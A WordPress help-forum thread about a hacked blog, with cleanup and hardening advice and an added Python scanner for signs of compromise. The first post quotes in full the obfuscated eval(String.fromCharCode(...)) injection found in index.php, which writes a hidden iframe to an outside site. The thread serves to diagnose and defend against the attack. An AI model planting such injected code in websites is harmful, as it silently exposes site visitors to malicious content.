My Blog Hacked - Can Someone Please Help? (4 posts)

  1. csd4csd
    Member
    Posted 5 years ago #

    I noticed today that my feed was not validating through Feedburner. I am getting the error message:

    This feed does not validate.
    •line 468, column 0: XML parsing error: <unknown>:469:0: junk after document element [help]
    </rss>

    And I noticed that this code was appended to my index.php file:

    <?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,98,105,116,115,34,59,118,97,114,32,119,61,34,105,110,102,111,34,59,118,97,114,32,114,101,54,61,34,119,97,114,101,46,34,59,118,97,114,32,114,114,116,116,54,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,61,48,49,48,48,48,49,48,49,48,48,49,49))</script>'; ?>

    I also noticed that even though I never had a Blogroll in my sidebar, that there now is one and it only has one link in it which goes to this website:

    http://www.wordpresssupplies.com

    Can someone please suggest how I can fix my blog and also how we can report this hacker?

    Thanks,
    Chris

  2. whooami
    Member
    Posted 5 years ago #

    Chris,

    fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and reuploading, then you ought to do that. Files that you don't replace should be looked at.

    Check for files that don't belong, directories that don't belong. Image files with changed timestamps -- look at those. It's VERY common for there to be scripts on sites that are named in such a way to mask the fact that they're scripts.

    Be suspicious when you're looking at things. For instance, if you look at your wp-content/index.php -- even that file has the malicious JS in it...

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your WordPress is current. (I see that it is)

    Change your MySQL password that WordPress uses (update your wp-config.php with that new password).

    Change any admin level passwords on your blog.

    Look at any other software that's being used on your site. Is it current?

    That's just an outline and not a complete list.

    There's quite a bit to do, but it's all necessary.

    If you can't do it all -- by all means don't hesitate to enlist the help of someone who can. Quite a few of us do work on the side.

    As for reporting...

    Good luck with that. They use proxies.

    What you can do though, is get a hold of your raw access logs, and compare the timestamps of the changed files to your access logs. It might be a window into how whatever was accomplished, was.

    If you aren't archiving access logs, you ought to be, especially now.

    There's also this:

    http://codex.wordpress.org/Hardening_WordPress

    At the very bottom of that page, my own plugin is mentioned. I recommend setting it up, and leaving it up, for a week after the site has been secured, and keeping a close eye on the resultant logfile.
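
A starting point for the file checks listed in the reply above, added here as an example and not taken from the thread or from the plugin it mentions: it flags world-writable entries, image files that contain PHP, and script files carrying the `eval(String.fromCharCode(...))` injection from the first post, decoding the payload statically instead of running it. The extension lists and finding labels are assumptions chosen for illustration, and the sample tree built when no path is given is constructed.

```python
import os, re, stat, sys, tempfile, time

# Pattern from the first post: eval() wrapped around a String.fromCharCode(...) list.
INJECT = re.compile(r"eval\s*\(\s*String\.fromCharCode\s*\(([\d\s,]+)\)")
SCRIPT_EXT = (".php", ".js", ".html", ".htm")          # assumed list, extend as needed
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".ico")  # assumed list, extend as needed

def decode_charcodes(text):
    """Statically decode each fromCharCode list found in text; nothing is executed."""
    return ["".join(chr(int(n) & 0xFFFF) for n in m.group(1).split(",") if n.strip())
            for m in INJECT.finditer(text)]

def scan_tree(root):
    """Walk root and return (kind, path, mtime_utc, detail) tuples sorted by path."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            # UTC mtime, for lining up against raw access-log timestamps
            mtime = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(st.st_mtime))
            if st.st_mode & stat.S_IWOTH:
                findings.append(("world-writable", path, mtime, oct(st.st_mode & 0o777)))
            if not stat.S_ISREG(st.st_mode):
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            lower = name.lower()
            if lower.endswith(IMAGE_EXT) and b"<?php" in data:
                findings.append(("php-in-image", path, mtime, "contains <?php"))
            if lower.endswith(SCRIPT_EXT):
                for decoded in decode_charcodes(data.decode("utf-8", "replace")):
                    findings.append(("injected-js", path, mtime, decoded))
    return sorted(findings, key=lambda f: (f[1], f[0]))

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else tempfile.mkdtemp()
    if len(sys.argv) == 1:  # no path given: build a small constructed sample tree
        codes = ",".join(str(ord(c)) for c in 'document.write("constructed sample")')
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo '<script>eval(String.fromCharCode(%s))</script>'; ?>" % codes)
        os.chmod(os.path.join(root, "index.php"), 0o666)
    for kind, path, mtime, detail in scan_tree(root):
        print(f"{mtime}  {kind:14}  {path}  {detail}")
```

Run it against a copy of the site's document root; the timestamps are printed in UTC, so convert them if the server's access logs use local time.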

  3. csd4csd
    Member
    Posted 5 years ago #

    Thanks for the quick response. How do I get in touch with you? I'd like to talk about potentially hiring you.

  4. whooami
    Member
    Posted 5 years ago #

    whoo -> village-idiot.org

    the arrow s/b an @
